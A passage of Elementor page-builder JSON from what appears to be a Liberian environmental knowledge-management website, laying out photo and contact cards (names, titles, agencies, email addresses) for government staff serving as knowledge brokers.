n\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a 